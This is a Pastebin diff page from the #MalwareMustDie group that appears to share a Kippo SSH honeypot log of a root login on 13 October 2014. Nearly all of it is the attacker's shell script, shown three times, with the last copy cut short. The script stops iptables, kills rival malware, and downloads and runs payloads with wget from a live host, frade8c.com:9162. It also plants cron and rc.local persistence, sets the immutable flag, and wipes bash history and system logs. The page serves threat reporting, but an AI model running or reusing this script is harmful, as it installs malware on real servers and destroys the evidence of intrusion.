API tools faq
paste
View difference between Paste ID: f0RjPwiZ and Ubgvwz2f
SHOW: | | - or go back to the newest paste.
1
#MalwareMustDie | Case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
2
#Follow report: still in the wild
3
warning: live URLs
4
5
#Reported log;

6
7
2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded

8
2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive

9
2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection

10
2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request

11
2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open

12
2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551]

13
2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop

14
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf

15
	echo "nameserver 8.8.4.4" >> /etc/resolv.conf

16
	apt-get -y install wget

17
	yum -y install wget

18
	chmod 7777 / etc

19
	killall -9 .IptabLes

20
	killall -9 nfsd4

21
	killall -9 profild.key

22
	cd /etc;rm -rf dir fake.cfg

23
	killall -9 nfsd

24
	killall -9 DDosl

25
	killall -9 lengchao32

26
	killall -9 b26

27
	killall -9 khelper

28
	killall -9 Bill

29
	killall -9 n26

30
	killall -9 007

31
	killall -9 codelove

32
	killall -9 32

33
	killall -9 m32

34
	killall -9 m64

35
	killall -9 64

36
	killall -9 83BOT 

37
	killall -9 82BOT

38
	killall -9 dos64

39
	killall -9 dos32

40
	killall -9 new6

41
	killall -9 new4

42
	killall -9 node24

43
	killall -9 mimi

44
	killall -9 nodeJR-1

45
	killall -9 freeBSD

46
	killall -9 ksapdd

47
	killall -9 106

48
	killall -9 09

49
	killall -9 xsw 

50
	killall -9 syslogd

51
	killall -9 skysapdd

52
	killall -9 cupsddd

53
	killall -9 ksapd

54
	killall -9 atddd

55
	killall -9 xfsdxd

56
	killall -9 sfewfesfs

57
	killall -9 gfhjrtfyhuf

58
	killall -9 rewgtf3er4t

59
	killall -9 fdsfsfvff

60
	killall -9 smarvtd

61
	killall -9 whitptabil

62
	killall -9 gdmorpen

63
	cd /etc;chattr -i 66

64
	cd /root; chmod 7777 / etc

65
	killall -9 minerd

66
	killall -9 syn

67
	killall -9 joudckfr

68
	killall -9 www

69
	killall -9 log

70
	killall -9 .IptabLes

71
	killall -9 .IptabLex

72
	killall -9 .Mm2

73
	killall -9 acpid

74
	killall -9 m64 

75
	killall -9 ./QQ

76
	killall -9 aabb

77
	killall -9 g3

78
	killall -9 S99local

79
	killall -9 3

80
	killall -9 pm

81
	killall -9 qweasd

82
	killall -9 tangtang

83
	killall -9 imap-login

84
	killall -9 xudp

85
	killall -9 sshpa

86
	killall -9 008

87
	killall -9 txma

88
	killall -9 mrdos64.b00

89
	killall -9 mrdos32.b00

90
	killall -9 kkpklp

91
	killall -9 kiilp

92
	killall -9 xin1

93
	killall -9 jibateng

94
	killall -9 syscore.sh

95
	killall -9 syscore.sh

96
	killall -9 syscore.sh

97
	killall -9 .mimeo 

98
	killall -9 .mimeo

99
	killall -9 .mimeo

100
	killall -9 .mimeop

101
	killall -9 .task1

102
	killall -9 .mimeop

103
	killall -9 .IptabLes

104
	killall -9 .IptabLex

105
	killall -9 .IptabLes

106
	killall -9 .IptabLex

107
	killall -9 .IptabLes

108
	killall -9 .IptabLex

109
	killall -9 .IptabLes

110
	killall -9 .IptabLex

111
	cd /root;rm -rf dir nohup.out

112
	cd /etc;rm -rf dir fake.cfg

113
	cd /etc;rm -rf dir cupsddd.*

114
	cd /etc;rm -rf dir atddd.*

115
	cd /etc;rm -rf dir ksapdd.*

116
	cd /etc;rm -rf dir kysapdd.*

117
	cd /etc;rm -rf dir sksapdd.*

118
	cd /etc;rm -rf dir skysapdd.*

119
	cd /etc;rm -rf dir xfsdxd.*

120
	cd /etc;rm -rf dir fake.cfg

121
	cd /etc;rm -rf dir cupsdd.*

122
	cd /etc;rm -rf dir atdd.*

123
	cd /etc;rm -rf dir ksapd.*

124
	cd /etc;rm -rf dir kysapd.*

125
	cd /etc;rm -rf dir sksapd.*

126
	cd /etc;rm -rf dir skysapd.*

127
	cd /etc;rm -rf dir xfsdx.*

128
	cd /etc;rm -rf dir sfewfesfs

129
	cd /etc;rm -rf dir gfhjrtfyhuf

130
	cd /etc;rm -rf dir rewgtf3er4t

131
	cd /etc;rm -rf dir fdsfsfvff

132
	cd /etc;rm -rf dir smarvtd

133
	cd /etc;rm -rf dir whitptabil

134
	cd /etc;rm -rf dir gdmorpen

135
	cd /etc;rm -rf dir sfewfesfs.*

136
	cd /etc;rm -rf dir gfhjrtfyhuf.*

137
	cd /etc;rm -rf dir rewgtf3er4t.*

138
	cd /etc;rm -rf dir fdsfsfvff.*

139
	cd /etc;rm -rf dir smarvtd.*

140
	cd /etc;rm -rf dir whitptabil.*

141
	cd /etc;rm -rf dir gdmorpen.*

142
	cd /etc;rm -rf dir nhgbhhj.*

143
	cd /tmp;rm -rf dir 1.*

144
	cd /tmp;rm -rf dir 2.*

145
	cd /tmp;rm -rf dir 3.*

146
	cd /tmp;rm -rf dir 4.*

147
	cd /tmp;rm -rf dir 5.*

148
	cd /tmp;rm -rf dir jdhe

149
	cd /tmp;rm -rf dir jdhe.*

150
	cd /var/spool/cron; rm -rf dir root.*

151
	cd /var/spool/cron; rm -rf dir root

152
	cd /var/spool/cron/crontabs; rm -rf dir root.*

153
	cd /var/spool/cron/crontabs; rm -rf dir root

154
	cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root

155
	cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root

156
	yes|mv /tmp/root /var/spool/cron

157
	yes|mv /tmp/root /var/spool/cron/crontabs

158
	cd /tmp;wget -c http://www.frade8c.com:9162/jdhe

159
	cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs

160
	cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf

161
	cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t

162
	cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff

163
	cd /etc;wget -c http://www.frade8c.com:9162/smarvtd

164
	cd /etc;wget -c http://www.frade8c.com:9162/whitptabil

165
	cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen

166
	cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj

167
	cd /etc;wget -c http://www.frade8c.com:9162/byv832

168
	cd /tmp;chmod 7777 jdhe

169
	cd /etc;chmod 7777 nhgbhhj

170
	cd /etc;chmod 7777 byv832

171
	cd /etc;chmod 7777 sfewfesfs

172
	cd /etc;chmod 7777 gfhjrtfyhuf

173
	cd /etc;chmod 7777 rewgtf3er4t

174
	cd /etc;chmod 7777 fdsfsfvff

175
	cd /etc;chmod 7777 smarvtd

176
	cd /etc;chmod 7777 whitptabil

177
	cd /etc;chmod 7777 gdmorpen

178
	cd /tmp;chmod 7777 nhgbhhj

179
	cd /tmp;chmod 7777 byv832

180
	cd /tmp;chmod 7777 sfewfesfs

181
	cd /tmp;chmod 7777 gfhjrtfyhuf

182
	cd /tmp;chmod 7777 rewgtf3er4t

183
	cd /tmp;chmod 7777 fdsfsfvff

184
	cd /tmp;chmod 7777 smarvtd

185
	cd /tmp;chmod 7777 whitptabil

186
	cd /tmp;chmod 7777 gdmorpen

187
	cd /tmp;./jdhe

188
	nohup /etc/sfewfesfs > /dev/null 2>&1&

189
	nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&

190
	nohup /etc/rewgtf3er4t > /dev/null 2>&1&

191
	nohup /etc/fdsfsfvff > /dev/null 2>&1&

192
	nohup /etc/smarvtd > /dev/null 2>&1&

193
	nohup /etc/whitptabil > /dev/null 2>&1&

194
	nohup /etc/gdmorpen > /dev/null 2>&1&

195
	nohup /etc/nhgbhhj > /dev/null 2>&1&

196
	nohup /etc/byv832 > /dev/null 2>&1&

197
	nohup /tmp/sfewfesfs > /dev/null 2>&1&

198
	nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&

199
	nohup /tmp/rewgtf3er4t > /dev/null 2>&1&

200
	nohup /tmp/fdsfsfvff > /dev/null 2>&1&

201
	nohup /tmp/smarvtd > /dev/null 2>&1&

202
	nohup /tmp/whitptabil > /dev/null 2>&1&

203
	nohup /tmp/gdmorpen > /dev/null 2>&1&

204
	nohup /tmp/nhgbhhj > /dev/null 2>&1&

205
	nohup /tmp/byv832 > /dev/null 2>&1&

206
	echo "cd /tmp;./sfewfesfs" >> /etc/rc.local 

207
	echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local 

208
	echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local 

209
	echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local 

210
	echo "cd /tmp;./smarvtd" >> /etc/rc.local 

211
	echo "cd /tmp;./whitptabil" >> /etc/rc.local 

212
	echo "cd /tmp;./gdmorpen" >> /etc/rc.local

213
	echo "cd /etc;./sfewfesfs" >> /etc/rc.local 

214
	echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local 

215
	echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local 

216
	echo "cd /etc;./fdsfsfvff" >> /etc/rc.local 

217
	echo "cd /etc;./smarvtd" >> /etc/rc.local 

218
	echo "cd /etc;./whitptabil" >> /etc/rc.local 

219
	echo "cd /etc;./gdmorpen" >> /etc/rc.local 

220
	echo "unset MAILCHECK" >> /etc/profile

221
	cd /etc;chattr +i sfewfesfs

222
	rm -rf /root/.bash_history

223
	touch /root/.bash_history

224
	history -r

225
	cd /var/log > dmesg 

226
	cd /var/log > auth.log 

227
	cd /var/log > alternatives.log 

228
	cd /var/log > boot.log 

229
	cd /var/log > btmp 

230
	cd /var/log > cron 

231
	cd /var/log > cups 

232
	cd /var/log > daemon.log 

233
	cd /var/log > dpkg.log 

234
	cd /var/log > faillog 

235
	cd /var/log > kern.log 

236
	cd /var/log > lastlog

237
	cd /var/log > maillog 

238
	cd /var/log > user.log 

239
	cd /var/log > Xorg.x.log 

240
	cd /var/log > anaconda.log 

241
	cd /var/log > yum.log 

242
	cd /var/log > secure

243
	cd /var/log > wtmp

244
	cd /var/log > utmp 

245
	cd /var/log > messages

246
	cd /var/log > spooler

247
	cd /var/log > sudolog

248
	cd /var/log > aculog

249
	cd /var/log > access-log

250
	cd /root > .bash_history

251
	history -c"

252
2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop

253
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf

254
	echo "nameserver 8.8.4.4" >> /etc/resolv.conf

255
	apt-get -y install wget

256
	yum -y install wget

257
	chmod 7777 / etc

258
	killall -9 .IptabLes

259
	killall -9 nfsd4

260
	killall -9 profild.key

261
	cd /etc;rm -rf dir fake.cfg

262
	killall -9 nfsd

263
	killall -9 DDosl

264
	killall -9 lengchao32

265
	killall -9 b26

266
	killall -9 khelper

267
	killall -9 Bill

268
	killall -9 n26

269
	killall -9 007

270
	killall -9 codelove

271
	killall -9 32

272
	killall -9 m32

273
	killall -9 m64

274
	killall -9 64

275
	killall -9 83BOT 

276
	killall -9 82BOT

277
	killall -9 dos64

278
	killall -9 dos32

279
	killall -9 new6

280
	killall -9 new4

281
	killall -9 node24

282
	killall -9 mimi

283
	killall -9 nodeJR-1

284
	killall -9 freeBSD

285
	killall -9 ksapdd

286
	killall -9 106

287
	killall -9 09

288
	killall -9 xsw 

289
	killall -9 syslogd

290
	killall -9 skysapdd

291
	killall -9 cupsddd

292
	killall -9 ksapd

293
	killall -9 atddd

294
	killall -9 xfsdxd

295
	killall -9 sfewfesfs

296
	killall -9 gfhjrtfyhuf

297
	killall -9 rewgtf3er4t

298
	killall -9 fdsfsfvff

299
	killall -9 smarvtd

300
	killall -9 whitptabil

301
	killall -9 gdmorpen

302
	cd /etc;chattr -i 66

303
	cd /root; chmod 7777 / etc

304
	killall -9 minerd

305
	killall -9 syn

306
	killall -9 joudckfr

307
	killall -9 www

308
	killall -9 log

309
	killall -9 .IptabLes

310
	killall -9 .IptabLex

311
	killall -9 .Mm2

312
	killall -9 acpid

313
	killall -9 m64 

314
	killall -9 ./QQ

315
	killall -9 aabb

316
	killall -9 g3

317
	killall -9 S99local

318
	killall -9 3

319
	killall -9 pm

320
	killall -9 qweasd

321
	killall -9 tangtang

322
	killall -9 imap-login

323
	killall -9 xudp

324
	killall -9 sshpa

325
	killall -9 008

326
	killall -9 txma

327
	killall -9 mrdos64.b00

328
	killall -9 mrdos32.b00

329
	killall -9 kkpklp

330
	killall -9 kiilp

331
	killall -9 xin1

332
	killall -9 jibateng

333
	killall -9 syscore.sh

334
	killall -9 syscore.sh

335
	killall -9 syscore.sh

336
	killall -9 .mimeo 

337
	killall -9 .mimeo

338
	killall -9 .mimeo

339
	killall -9 .mimeop

340
	killall -9 .task1

341
	killall -9 .mimeop

342
	killall -9 .IptabLes

343
	killall -9 .IptabLex

344
	killall -9 .IptabLes

345
	killall -9 .IptabLex

346
	killall -9 .IptabLes

347
	killall -9 .IptabLex

348
	killall -9 .IptabLes

349
	killall -9 .IptabLex

350
	cd /root;rm -rf dir nohup.out

351
	cd /etc;rm -rf dir fake.cfg

352
	cd /etc;rm -rf dir cupsddd.*

353
	cd /etc;rm -rf dir atddd.*

354
	cd /etc;rm -rf dir ksapdd.*

355
	cd /etc;rm -rf dir kysapdd.*

356
	cd /etc;rm -rf dir sksapdd.*

357
	cd /etc;rm -rf dir skysapdd.*

358
	cd /etc;rm -rf dir xfsdxd.*

359
	cd /etc;rm -rf dir fake.cfg

360
	cd /etc;rm -rf dir cupsdd.*

361
	cd /etc;rm -rf dir atdd.*

362
	cd /etc;rm -rf dir ksapd.*

363
	cd /etc;rm -rf dir kysapd.*

364
	cd /etc;rm -rf dir sksapd.*

365
	cd /etc;rm -rf dir skysapd.*

366
	cd /etc;rm -rf dir xfsdx.*

367
	cd /etc;rm -rf dir sfewfesfs

368
	cd /etc;rm -rf dir gfhjrtfyhuf

369
	cd /etc;rm -rf dir rewgtf3er4t

370
	cd /etc;rm -rf dir fdsfsfvff

371
	cd /etc;rm -rf dir smarvtd

372
	cd /etc;rm -rf dir whitptabil

373
	cd /etc;rm -rf dir gdmorpen

374
	cd /etc;rm -rf dir sfewfesfs.*

375
	cd /etc;rm -rf dir gfhjrtfyhuf.*

376
	cd /etc;rm -rf dir rewgtf3er4t.*

377
	cd /etc;rm -rf dir fdsfsfvff.*

378
	cd /etc;rm -rf dir smarvtd.*

379
	cd /etc;rm -rf dir whitptabil.*

380
	cd /etc;rm -rf dir gdmorpen.*

381
	cd /etc;rm -rf dir nhgbhhj.*

382
	cd /tmp;rm -rf dir 1.*

383
	cd /tmp;rm -rf dir 2.*

384
	cd /tmp;rm -rf dir 3.*

385
	cd /tmp;rm -rf dir 4.*

386
	cd /tmp;rm -rf dir 5.*

387
	cd /tmp;rm -rf dir jdhe

388
	cd /tmp;rm -rf dir jdhe.*

389
	cd /var/spool/cron; rm -rf dir root.*

390
	cd /var/spool/cron; rm -rf dir root

391
	cd /var/spool/cron/crontabs; rm -rf dir root.*

392
	cd /var/spool/cron/crontabs; rm -rf dir root

393
	cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root

394
	cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root

395
	yes|mv /tmp/root /var/spool/cron

396
	yes|mv /tmp/root /var/spool/cron/crontabs

397
	cd /tmp;wget -c http://www.frade8c.com:9162/jdhe

398
	cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs

399
	cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf

400
	cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t

401
	cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff

402
	cd /etc;wget -c http://www.frade8c.com:9162/smarvtd

403
	cd /etc;wget -c http://www.frade8c.com:9162/whitptabil

404
	cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen

405
	cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj

406
	cd /etc;wget -c http://www.frade8c.com:9162/byv832

407
	cd /tmp;chmod 7777 jdhe

408
	cd /etc;chmod 7777 nhgbhhj

409
	cd /etc;chmod 7777 byv832

410
	cd /etc;chmod 7777 sfewfesfs

411
	cd /etc;chmod 7777 gfhjrtfyhuf

412
	cd /etc;chmod 7777 rewgtf3er4t

413
	cd /etc;chmod 7777 fdsfsfvff

414
	cd /etc;chmod 7777 smarvtd

415
	cd /etc;chmod 7777 whitptabil

416
	cd /etc;chmod 7777 gdmorpen

417
	cd /tmp;chmod 7777 nhgbhhj

418
	cd /tmp;chmod 7777 byv832

419
	cd /tmp;chmod 7777 sfewfesfs

420
	cd /tmp;chmod 7777 gfhjrtfyhuf

421
	cd /tmp;chmod 7777 rewgtf3er4t

422
	cd /tmp;chmod 7777 fdsfsfvff

423
	cd /tmp;chmod 7777 smarvtd

424
	cd /tmp;chmod 7777 whitptabil

425
	cd /tmp;chmod 7777 gdmorpen

426
	cd /tmp;./jdhe

427
	nohup /etc/sfewfesfs > /dev/null 2>&1&

428
	nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&

429
	nohup /etc/rewgtf3er4t > /dev/null 2>&1&

430
	nohup /etc/fdsfsfvff > /dev/null 2>&1&

431
	nohup /etc/smarvtd > /dev/null 2>&1&

432
	nohup /etc/whitptabil > /dev/null 2>&1&

433
	nohup /etc/gdmorpen > /dev/null 2>&1&

434
	nohup /etc/nhgbhhj > /dev/null 2>&1&

435
	nohup /etc/byv832 > /dev/null 2>&1&

436
	nohup /tmp/sfewfesfs > /dev/null 2>&1&

437
	nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&

438
	nohup /tmp/rewgtf3er4t > /dev/null 2>&1&

439
	nohup /tmp/fdsfsfvff > /dev/null 2>&1&

440
	nohup /tmp/smarvtd > /dev/null 2>&1&

441
	nohup /tmp/whitptabil > /dev/null 2>&1&

442
	nohup /tmp/gdmorpen > /dev/null 2>&1&

443
	nohup /tmp/nhgbhhj > /dev/null 2>&1&

444
	nohup /tmp/byv832 > /dev/null 2>&1&

445
	echo "cd /tmp;./sfewfesfs" >> /etc/rc.local 

446
	echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local 

447
	echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local 

448
	echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local 

449
	echo "cd /tmp;./smarvtd" >> /etc/rc.local 

450
	echo "cd /tmp;./whitptabil" >> /etc/rc.local 

451
	echo "cd /tmp;./gdmorpen" >> /etc/rc.local

452
	echo "cd /etc;./sfewfesfs" >> /etc/rc.local 

453
	echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local 

454
	echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local 

455
	echo "cd /etc;./fdsfsfvff" >> /etc/rc.local 

456
	echo "cd /etc;./smarvtd" >> /etc/rc.local 

457
	echo "cd /etc;./whitptabil" >> /etc/rc.local 

458
	echo "cd /etc;./gdmorpen" >> /etc/rc.local 

459
	echo "unset MAILCHECK" >> /etc/profile

460
	cd /etc;chattr +i sfewfesfs

461
	rm -rf /root/.bash_history

462
	touch /root/.bash_history

463
	history -r

464
	cd /var/log > dmesg 

465
	cd /var/log > auth.log 

466
	cd /var/log > alternatives.log 

467
	cd /var/log > boot.log 

468
	cd /var/log > btmp 

469
	cd /var/log > cron 

470
	cd /var/log > cups 

471
	cd /var/log > daemon.log 

472
	cd /var/log > dpkg.log 

473
	cd /var/log > faillog 

474
	cd /var/log > kern.log 

475
	cd /var/log > lastlog

476
	cd /var/log > maillog 

477
	cd /var/log > user.log 

478
	cd /var/log > Xorg.x.log 

479
	cd /var/log > anaconda.log 

480
	cd /var/log > yum.log 

481
	cd /var/log > secure

482
	cd /var/log > wtmp

483
	cd /var/log > utmp 

484
	cd /var/log > messages

485
	cd /var/log > spooler

486
	cd /var/log > sudolog

487
	cd /var/log > aculog

488
	cd /var/log > access-log

489
	cd /root > .bash_history

490
	history -c"

491
2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log

492
2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop

493
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf

494
	echo "nameserver 8.8.4.4" >> /etc/resolv.conf

495
	apt-get -y install wget

496
	yum -y install wget

497
	chmod 7777 / etc

498
	killall -9 .IptabLes

499
	killall -9 nfsd4

500
	killall -9 profild.key

501
	cd /etc;rm -rf dir fake.cfg

502
	killall -9 nfsd

503
	killall -9 DDosl

504
	killall -9 lengchao32

505
	killall -9 b26

506
	killall -9 khelper

507
	killall -9 Bill

508
	killall -9 n26

509
	killall -9 007

510
	killall -9 codelove

511
	killall -9 32

512
	killall -9 m32

513
	killall -9 m64

514
	killall -9 64

515
	killall -9 83BOT 

516
	killall -9 82BOT

517
	killall -9 dos64

518
	killall -9 dos32

519
	killall -9 new6

520
	killall -9 new4

521
	killall -9 node24

522
	killall -9 mimi

523
	killall -9 nodeJR-1

524
	killall -9 freeBSD

525
	killall -9 ksapdd

526
	killall -9 106

527
	killall -9 09

528
	killall -9 xsw 

529
	killall -9 syslogd

530
	killall -9 skysapdd

531
	killall -9 cupsddd

532
	killall -9 ksapd

533
	killall -9 atddd

534
	killall -9 xfsdxd

535
	killall -9 sfewfesfs

536
	killall -9 gfhjrtfyhuf

537
	killall -9 rewgtf3er4t

538
	killall -9 fdsfsfvff

539
	killall -9 smarvtd

540
	killall -9 whitptabil

541
	killall -9 gdmorpen

542
	cd /etc;chattr -i 66

543
	cd /root; chmod 7777 / etc

544
	killall -9 minerd

545
	killall -9 syn

546
	killall -9 joudckfr

547
	killall -9 www

548
	killall -9 log

549
	killall -9 .IptabLes

550
	killall -9 .IptabLex

551
	killall -9 .Mm2

552
	killall -9 acpid

553
	killall -9 m64 

554
	killall -9 ./QQ

555
	killall -9 aabb

556
	killall -9 g3

557
	killall -9 S99local

558
	killall -9 3

559
	killall -9 pm

560
	killall -9 qweasd

561
	killall -9 tangtang

562
	killall -9 imap-login

563
	killall -9 xudp

564
	killall -9 sshpa

565
	killall -9 008

566
	killall -9 txma

567
	killall -9 mrdos64.b00

568
	killall -9 mrdos32.b00

569
	killall -9 kkpklp

570
	killall -9 kiilp

571
	killall -9 xin1

572
	killall -9 jibateng

573
	killall -9 syscore.sh

574
	killall -9 syscore.sh

575
	killall -9 syscore.sh

576
	killall -9 .mimeo 

577
	killall -9 .mimeo

578
	killall -9 .mimeo

579
	killall -9 .mimeop

580
	killall -9 .task1

581
	killall -9 .mimeop

582
	killall -9 .IptabLes

583
	killall -9 .IptabLex

584
	killall -9 .IptabLes

585
	killall -9 .IptabLex

586
	killall -9 .IptabLes

587
	killall -9 .IptabLex

588
	killall -9 .IptabLes

589
	killall -9 .IptabLex

590
	cd /root;rm -rf dir nohup.out

591
	cd /etc;rm -rf dir fake.cfg

592
	cd /etc;rm -rf dir cupsddd.*

593
	cd /etc;rm -rf dir atddd.*

594
	cd /etc;rm -rf dir ksapdd.*

595
	cd /etc;rm -rf dir kysapdd.*

596
	cd /etc;rm -rf dir sksapdd.*

597
	cd /etc;rm -rf dir skysapdd.*

598
	cd /etc;rm -rf dir xfsdxd.*

599
	cd /etc;rm -rf dir fake.cfg

600
	cd /etc;rm -rf dir cupsdd.*

601
	cd /etc;rm -rf dir atdd.*

602
	cd /etc;rm -rf dir ksapd.*

603
	cd /etc;rm -rf dir kysapd.*

604
	cd /etc;rm -rf dir sksapd.*

605
	cd /etc;rm -rf dir skysapd.*

606
	cd /etc;rm -rf dir xfsdx.*

607
	cd /etc;rm -rf dir sfewfesfs

608
	cd /etc;rm -rf dir gfhjrtfyhuf

609
	cd /etc;rm -rf dir rewgtf3er4t

610
	cd /etc;rm -rf dir fdsfsfvff

611
	cd /etc;rm -rf dir smarvtd

612
	cd /etc;rm -rf dir whitptabil

613
	cd /etc;rm -rf dir gdmorpen

614
	cd /etc;rm -rf dir sfewfesfs.*

615
	cd /etc;rm -rf dir gfhjrtfyhuf.*

616
	cd /etc;rm -rf dir rewgtf3er4t.*

617
	cd /etc;rm -rf dir fdsfsfvff.*

618
	cd /etc;rm -rf dir smarvtd.*

619
	cd /etc;rm -rf dir whitptabil.*

620
	cd /etc;rm -rf dir gdmorpen.*

621
	cd /etc;rm -rf dir nhgbhhj.*

622
	cd /tmp;rm -rf dir 1.*

623
	cd /tmp;rm -rf dir 2.*

624
	cd /tmp;rm -rf dir 3.*

625
	cd /tmp;rm -rf dir 4.*

626
	cd /tmp;rm -rf dir 5.*

627
	cd /tmp;rm -rf dir jdhe

628
	cd /tmp;rm -rf dir jdhe.*

629
	cd /var/spool/cron; rm -rf dir root.*

630
	cd /var/spool/cron; rm -rf dir root

631
	cd /var/spool/cron/crontabs; rm -rf dir root.*

632
	cd /var/spool/cron/crontabs; rm -rf dir root

633
	cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root

634
	cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root

635
	yes|mv /tmp/root /var/spool/cron

636
	yes|mv /tmp/root /var/spool/cron/crontabs

637
	cd /tmp;wget -c http://www.frade8c.com:9162/jdhe

638
	cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs

639
	cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf

640
	cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t

641
	cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff

642
	cd /etc;wget -c http://www.frade8c.com:9162/smarvtd

643
	cd /etc;wget -c http://www.frade8c.com:9162/whitptabil

644
	cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen

645
	cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj

646
	cd /etc;wget -c http://www.frade8c.com:9162/byv832

647
	cd /tmp;chmod 7777 jdhe

648
	cd /etc;chmod 7777 nhgbhhj

649
	cd /etc;chmod 7777 byv832

650
	cd /etc;chmod 7777 sfewfesfs

651
	cd /etc;chmod 7777 gfhjrtfyhuf

652
	cd /etc;chmod 7777 rewgtf3er4t

653
	cd /etc;chmod 7777 fdsfsfvff

654
	cd /etc;chmod 7777 smarvtd

655
	cd /etc;chmod 7777 whitptabil

656
	cd /etc;chmod 7777 gdmorpen

657
	cd /tmp;chmod 7777 nhgbhhj

658
	cd /tmp;chmod 7777 byv832

659
	cd /tmp;chmod 7777 sfewfesfs

660
	cd /tmp;chmod 7777 gfhjrtfyhuf

661
	cd /tmp;chmod 7777 rewgtf3er4t

662
	cd /tmp;chmod 7777 fdsfsfvff

663
	cd /tmp;chmod 7777 smarvtd

664
	cd /tmp;chmod 7777 whitptabil

665
	cd /tmp;chmod 7777 gdmorpen

666
	cd /tmp;./jdhe

667
	nohup /etc/sfewfesfs > /dev/null 2>&1&

668
	nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&

669
	nohup /etc/rewgtf3er4t > /dev/null 2>&1&

670
	nohup /etc/fdsfsfvff > /dev/null 2>&1&

671
	nohup /etc/smarvtd > /dev/null 2>&1&

672
	nohup /etc/whitptabil > /dev/null 2>&1&

673
	nohup /etc/gdmorpen > /dev/null 2>&1&

674
	nohup /etc/nhgbhhj > /dev/null 2>&1&

675
	nohup /etc/byv832 > /dev/null 2>&1&

676
	nohup /tmp/sfewfesfs > /dev/null 2>&1&

677
	nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&

678
	nohup /tmp/rewgtf3er4t > /dev/null 2>&1&

679
	nohup /tmp/fdsfsfvff > /dev/null 2>&1&

680
	nohup /tmp/smarvtd > /dev/null 2>&1&

681
	nohup /tmp/whitptabil > /dev/null 2>&1&

682
	nohup /tmp/gdmorpen > /dev/null 2>&1&

683
	nohup /tmp/nhgbhhj > /dev/null 2>&1&

684
	nohup /tmp/byv832 > /dev/null 2>&1&

685
	echo "cd /tmp;./sfewfesfs" >> /etc/rc.local 

686
	echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local 

687
	echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local 

688
	echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local 

689
	echo "cd /tmp;./smarvtd" >> /etc/rc.local 

690
	echo "cd /tmp;./whitptabil" >> /etc/rc.local 

691
	echo "cd /tmp;./gdmorpen" >> /etc/rc.local

692
	echo "cd /etc;./sfewfesfs" >> /etc/rc.local 

693
	echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local 

694
	echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local 

695
	echo "cd /etc;./fdsfsfvff" >> /etc/rc.local 

696
	echo "cd /etc;./smarvtd" >> /etc/rc.local 

697
	echo "cd /etc;./whitptabil" >> /etc/rc.local 

698
	echo "cd /etc;./gdmorpen" >> /etc/rc.local 

699
	echo "unset MAILCHECK" >> /etc/profile

700
	cd /etc;chattr +i sfewfesfs

701
	rm -rf /root/.bash_history

702
	touch /root/.bash_history

703
	history -r

704
	cd /var/log > dmesg 

705
	cd /var/log > auth.log 

706
